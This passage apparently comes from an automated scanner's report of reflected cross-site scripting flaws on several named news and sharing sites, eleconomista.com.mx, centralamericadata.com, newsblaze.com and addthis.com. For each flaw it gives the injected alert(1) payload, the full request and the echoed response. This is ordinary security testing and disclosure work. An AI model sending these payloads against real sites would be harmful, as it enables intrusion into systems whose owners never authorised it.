Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:59 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=4s7qqbdoi397sql4m22811sd85; expires=Wed, 05-Jan-2011 06:51:19 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:18:00 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:17:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 31969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<head profil
...[SNIP]...
<!-- tagCertifica(106727,"/eleconomista/industrias/2010/06/21/sector-telecom-ganara-mayor-competencia-analistasfd318"-alert(1)-"d3ee9d4d75d"); //-->
...[SNIP]...
1.17. http://eleconomista.com.mx/industrias/2010/06/21/sector-telecom-ganara-mayor-competencia-analistas [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cab89"-alert(1)-"2b4f4ab8270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /industrias/2010/06/21/sector-telecom-ganara-mayor-competencia-analistas?cab89"-alert(1)-"2b4f4ab8270=1 HTTP/1.1
Host: eleconomista.com.mx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:16:01 GMT
Server: Apache
Set-Cookie: SESS3defb5b8bcfc02902890836db0def65b=au5v4el48rufnabs5dpbv63s30; expires=Wed, 05-Jan-2011 06:49:21 GMT; path=/; domain=.eleconomista.com.mx
Set-Cookie: mt_redirect=true; expires=Mon, 13-Dec-2010 03:16:02 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 03:16:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: es
Content-Length: 43731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr"> <head profil ...[SNIP]... <!-- tagCertifica(106727,"/eleconomista/industrias/2010/06/21/sector-telecom-ganara-mayor-competencia-analistas?cab89"-alert(1)-"2b4f4ab8270=1"); //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5533'><script>alert(1)</script>1f5138548c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /enb5533'><script>alert(1)</script>1f5138548c5/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015 HTTP/1.1
Host: en.centralamericadata.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Mon, 13 Dec 2010 03:17:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: CENTRALAMERICADATA=19b4nkobnbggr7csmuqs3e9v00; expires=Mon, 20-Dec-2010 03:17:43 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> 404 Not Foun ...[SNIP]... <a href='http://en.centralamericadata.com/enb5533'><script>alert(1)</script>1f5138548c5/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf5ec'><script>alert(1)</script>b1e5f6c668d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/articlebf5ec'><script>alert(1)</script>b1e5f6c668d/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015 HTTP/1.1
Host: en.centralamericadata.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Mon, 13 Dec 2010 03:17:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: CENTRALAMERICADATA=gio37ug9cicmsrkpv83fti5mi6; expires=Mon, 20-Dec-2010 03:17:43 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> 404 Not Foun ...[SNIP]... <a href='http://en.centralamericadata.com/en/articlebf5ec'><script>alert(1)</script>b1e5f6c668d/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015'> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c21f0'><script>alert(1)</script>31c9b904f17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/article/business_commercec21f0'><script>alert(1)</script>31c9b904f17/Nicaragua_Mobile_Penetration_to_Top_80_in_2015 HTTP/1.1
Host: en.centralamericadata.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Mon, 13 Dec 2010 03:17:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: CENTRALAMERICADATA=elqbnn32pulq40dves2uamaqq0; expires=Mon, 20-Dec-2010 03:17:44 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CakeCookie[]=Q2FrZQ%3D%3D.dME%3D; expires=Mon, 28-Nov-2011 03:17:44 GMT; path=/
Set-Cookie: CENTRALAMERICADATA=elqbnn32pulq40dves2uamaqq0; expires=Mon, 20-Dec-2010 03:17:44 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> 404 Not Foun ...[SNIP]... <a href='http://www.centralamericadata.com/es/article/business_commercec21f0'><script>alert(1)</script>31c9b904f17/Nicaragua_Mobile_Penetration_to_Top_80_in_2015'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25857'><script>alert(1)</script>d8f7b2f1bde was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_201525857'><script>alert(1)</script>d8f7b2f1bde HTTP/1.1
Host: en.centralamericadata.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Mon, 13 Dec 2010 03:17:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: CENTRALAMERICADATA=2mn3ckubf50mda8otjfiu9mfs1; expires=Mon, 20-Dec-2010 03:17:46 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CakeCookie[]=Q2FrZQ%3D%3D.dME%3D; expires=Mon, 28-Nov-2011 03:17:46 GMT; path=/
Set-Cookie: CENTRALAMERICADATA=2mn3ckubf50mda8otjfiu9mfs1; expires=Mon, 20-Dec-2010 03:17:46 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> 404 Not Foun ...[SNIP]... <a href='http://www.centralamericadata.com/es/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_201525857'><script>alert(1)</script>d8f7b2f1bde'> ...[SNIP]...
1.22. http://en.centralamericadata.com/en/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a353'><script>alert(1)</script>15be3e6330 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015?7a353'><script>alert(1)</script>15be3e6330=1 HTTP/1.1
Host: en.centralamericadata.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:17:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: CENTRALAMERICADATA=aori2v2k5rc93hepje0ab86qc3; expires=Mon, 20-Dec-2010 03:17:37 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CakeCookie[]=Q2FrZQ%3D%3D.dME%3D; expires=Mon, 28-Nov-2011 03:17:37 GMT; path=/
Set-Cookie: OAGEO=US%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C
Set-Cookie: OAID=391b8b8024046aacde47f165c7e83cf0; expires=Tue, 13-Dec-2011 03:17:37 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Nicaragua: M ...[SNIP]... <a href='http://www.centralamericadata.com/es/article/business_commerce/Nicaragua_Mobile_Penetration_to_Top_80_in_2015?7a353'><script>alert(1)</script>15be3e6330=1'> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10901'%3bb74e7291332 was submitted in the REST URL parameter 3. This input was echoed as 10901';b74e7291332 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/2010061707210200001.pnw/topstory.html10901'%3bb74e7291332 HTTP/1.1
Host: newsblaze.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:19:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Cache-Control: max-age=300
Expires: Mon, 13 Dec 2010 03:24:50 GMT
Connection: close
Content-Type: text/html
Content-Length: 35817
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... <a href="mailto:comment@newsblaze.com?Subject=Comment:2010061707210200001.pnw&body=Comment%20on%20story%20http://newsblaze.com/story/2010061707210200001.pnw/topstory.html10901';b74e7291332"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a9dc7(a)fc6897a9e9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/2010061707210200001.pnw/topstory.htmla9dc7(a)fc6897a9e9d HTTP/1.1
Host: newsblaze.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:19:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Cache-Control: max-age=300
Expires: Mon, 13 Dec 2010 03:24:50 GMT
Connection: close
Content-Type: text/html
Content-Length: 35829
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... Headline=AME%20Operators%20Experiment%20With%20Mobile%20Broadband%20Pricing%20Strategies,%20Pyramid%20Finds;yahooBuzzArticleId=http:%2F%2Fnewsblaze.com%2Fstory%2F2010061707210200001.pnw%2Ftopstory.htmla9dc7(a)fc6897a9e9d;</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 660ee"><img%20src%3da%20onerror%3dalert(1)>785d291e673 was submitted in the REST URL parameter 3. This input was echoed as 660ee"><img src=a onerror=alert(1)>785d291e673 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /story/2010061707210200001.pnw/topstory.html660ee"><img%20src%3da%20onerror%3dalert(1)>785d291e673 HTTP/1.1
Host: newsblaze.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:19:48 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Cache-Control: max-age=300
Expires: Mon, 13 Dec 2010 03:24:48 GMT
Connection: close
Content-Type: text/html
Content-Length: 36018
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... <a href="http://newsblaze.com/sendtoafriend/2010061707210200001.pnw/topstory.html660ee"><img src=a onerror=alert(1)>785d291e673" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d8f47(a)375001c605a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/2010072006011400006.pnw/topstory.htmld8f47(a)375001c605a HTTP/1.1
Host: newsblaze.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:19:54 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Cache-Control: max-age=300
Expires: Mon, 13 Dec 2010 03:24:54 GMT
Connection: close
Content-Type: text/html
Content-Length: 36064
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... cleHeadline=Undersea%20Cables%20and%20WiMax%20to%20Propel%20Africas%20Broadband%20Growth,%20Pyramid%20Finds;yahooBuzzArticleId=http:%2F%2Fnewsblaze.com%2Fstory%2F2010072006011400006.pnw%2Ftopstory.htmld8f47(a)375001c605a;</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6749"><img%20src%3da%20onerror%3dalert(1)>5aa62903c93 was submitted in the REST URL parameter 3. This input was echoed as c6749"><img src=a onerror=alert(1)>5aa62903c93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /story/2010072006011400006.pnw/topstory.htmlc6749"><img%20src%3da%20onerror%3dalert(1)>5aa62903c93 HTTP/1.1
Host: newsblaze.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:19:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Cache-Control: max-age=300
Expires: Mon, 13 Dec 2010 03:24:52 GMT
Connection: close
Content-Type: text/html
Content-Length: 36253
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... <a href="http://newsblaze.com/sendtoafriend/2010072006011400006.pnw/topstory.htmlc6749"><img src=a onerror=alert(1)>5aa62903c93" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7387c'%3bc578768a703 was submitted in the REST URL parameter 3. This input was echoed as 7387c';c578768a703 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/2010072006011400006.pnw/topstory.html7387c'%3bc578768a703 HTTP/1.1
Host: newsblaze.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:19:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Cache-Control: max-age=300
Expires: Mon, 13 Dec 2010 03:24:53 GMT
Connection: close
Content-Type: text/html
Content-Length: 36052
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... <a href="mailto:comment@newsblaze.com?Subject=Comment:2010072006011400006.pnw&body=Comment%20on%20story%20http://newsblaze.com/story/2010072006011400006.pnw/topstory.html7387c';c578768a703"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9d8bf(a)d620161ff15 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/2010120306010700010.pnw/topstory.html9d8bf(a)d620161ff15 HTTP/1.1
Host: newsblaze.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:19:57 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Cache-Control: max-age=300
Expires: Mon, 13 Dec 2010 03:24:57 GMT
Connection: close
Content-Type: text/html
Content-Length: 35098
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... eadline=Latin%20American%20Operators%20Look%20to%20Cash%20in%20on%20Mobile%20Remittances,%20Pyramid%20Finds;yahooBuzzArticleId=http:%2F%2Fnewsblaze.com%2Fstory%2F2010120306010700010.pnw%2Ftopstory.html9d8bf(a)d620161ff15;</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 906e2"><img%20src%3da%20onerror%3dalert(1)>72c6bfe3057 was submitted in the REST URL parameter 3. This input was echoed as 906e2"><img src=a onerror=alert(1)>72c6bfe3057 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /story/2010120306010700010.pnw/topstory.html906e2"><img%20src%3da%20onerror%3dalert(1)>72c6bfe3057 HTTP/1.1
Host: newsblaze.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:19:55 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Cache-Control: max-age=300
Expires: Mon, 13 Dec 2010 03:24:55 GMT
Connection: close
Content-Type: text/html
Content-Length: 35287
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... <a href="http://newsblaze.com/sendtoafriend/2010120306010700010.pnw/topstory.html906e2"><img src=a onerror=alert(1)>72c6bfe3057" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bec49'%3bd3e9c559b95 was submitted in the REST URL parameter 3. This input was echoed as bec49';d3e9c559b95 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/2010120306010700010.pnw/topstory.htmlbec49'%3bd3e9c559b95 HTTP/1.1
Host: newsblaze.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 03:19:57 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
Cache-Control: max-age=300
Expires: Mon, 13 Dec 2010 03:24:57 GMT
Connection: close
Content-Type: text/html
Content-Length: 35086
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <link rel="stylesheet" href="http://NewsBlaze.com/newspaperinfo/includes/style/styl ...[SNIP]... <a href="mailto:comment@newsblaze.com?Subject=Comment:2010120306010700010.pnw&body=Comment%20on%20story%20http://newsblaze.com/story/2010120306010700010.pnw/topstory.htmlbec49';d3e9c559b95"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dc01"-alert(1)-"1fe8f119d84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php5dc01"-alert(1)-"1fe8f119d84 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Mon, 13 Dec 2010 03:17:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ajgaecl874cfqae1c61bj67m32; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php5dc01"-alert(1)-"1fe8f119d84"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5db78<script>alert(1)</script>b688aeeda56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php5db78<script>alert(1)</script>b688aeeda56 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Mon, 13 Dec 2010 03:17:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=k86onhatlijlg7v472pnupbck2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
